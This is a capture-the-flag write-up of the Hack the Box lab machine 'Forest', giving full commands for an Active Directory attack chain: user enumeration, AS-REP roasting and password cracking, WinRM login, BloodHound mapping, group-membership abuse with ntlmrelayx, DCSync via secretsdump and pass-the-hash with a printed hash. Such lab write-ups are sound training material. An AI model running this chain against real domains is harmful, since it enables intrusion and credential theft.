Welcome back everyone. Today we will be doing the Hack the Box machine Forest. The box is listed as an easy Windows box. Let's jump in!
As normal, we kick it off with an
nmap -sC -sV -oA initial_scan 10.10.10.161
Here are our results:
Nmap scan report for 10.10.10.161 Host is up (0.15s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-10 14:45:10Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=12/10%Time=5DEFADE2%P=x86_64-pc-linux-gnu%r(DNS SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version SF:\x04bind\0\0\x10\0\x03"); Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m48s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2019-12-10T06:47:44-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-12-10T14:47:41 |_ start_date: 2019-12-10T05:12:53 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 307.76 seconds
We initially see
SMB ports available. Let's see what might be shared on
SMB. Repeating the scan again with
-p- gives us some additional ports as well. Most notabled
SMBMap gives us access denied. Next we'll try to gain access via
rpclient -U "" -N 10.10.10.161. This gives us access, we can enumerate users this way using
enumdomusers within our connection:
We can take those and paste them into a file called
users.txt. Now we want to remove all the junk and essentially keep the usernames. A quick one liner:
cat users.txt | cut -d "[" -f2 | cut -d "]" -f1 > trimmed_users.txt.
Now that we have a list of users. We could try a few things bruteforce, kerberoasting or AS-REP Roast. Lucky for us
impacket gives us the tools to try all of these out.
At the time of writting this, the current version of
Impacket on Kali is 9.18 which does NOT support userfiles command. You'll need to add a username one at a time. You can also copy the updated script from here and use that.
First we'll use
GetNPUsers.py to see if any users have
DONT_REQ_PREAUTH enabled. If we find some, we can use AS-REP to obtain some leverage.
./GetNPUsers.py htb/ -userfile trimmed_users.txt -format john -dc-ip 10.10.10.161
A breakdown of the above command. The
htb/ is our domain.
-usersfile is the file we created earlier.
-format john means we want to output our format for easy cracking in
-dc-ip is our target Domain Controller, in this case, our target.
Now that we have a username and hash, we can crack it in
John. We issue
John --wordlist=/usr/share/wordlists/rockyou.txt vuln_users.txt to get the cracking going. Shortly we have a result:
Now that we have a set of credentials, we can look to use those. Our earlier enumeration showed us that we could leverage
Win-RM on port
5985. So we'll do just that. We'll use Evil-WinRM and start enumerating further.
evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Now that we have a shell and we have access to the
user.txt flag. Onto root! We can start enumerating internally. We do the normal groups and user checks with
net user svc-alfresco and
net group to start. Here is a quick link to some enumeration methods for Windows machines: Payload All the Things.
We see that there are exchanges groups listed on the system. To better help visualize the path we want to take to domain admin, we can use
Bloodhound. If you're a Kali user you can simply
apt get install Bloodhound. Otherwise, follow the directions on the Github.
Once installed, we need to leverage SharpHound.ps1 to gain data. We find that script here. Upload that file via
upload /root/Tools/SharpHound.ps1 C:\Users\svc-alfresco\Documents
Import the module into our Powershell prompt:
invoke-bloodhound -CollectionMethod All -Domain htb.local -LDAPUser svc-alfresco -LDAPPass s3rvice.
This will compile all sorts of AD data into a zip file for us to download. Once downloaded, upload the data into
Bloodhound. We can then filter by 'Highest Value Target' and start narrowing down a path to take based on our previous research.
Based on our above breakdown we can see that we have the ability to write to the
Exchange Windows Permissions group. So we'll want to add ourselves to that group.
net group "Exchange Windows Permissions" svc-alfresco /ADD
Once we are part of that group we can try to escalate our privileges based on this research.
So we'll spin up our
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Then we can browse to our ip and authenticate with
After a few resets on the box and switching from EU to US a few times, it finally worked. We now can dump some secrets.
python secretsdump.py firstname.lastname@example.org -just-dc
This kicks out a whole bunch of hashes. So our goal is to pass the hash as administrator for a shell.
To do this we'll use
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 Administrator@10.10.10.161
There we have it, our root shell with flag!
Hopefully something was learned. If you found this write-up helpful, consider sending some respect my way: Lovecore's HTB Profile.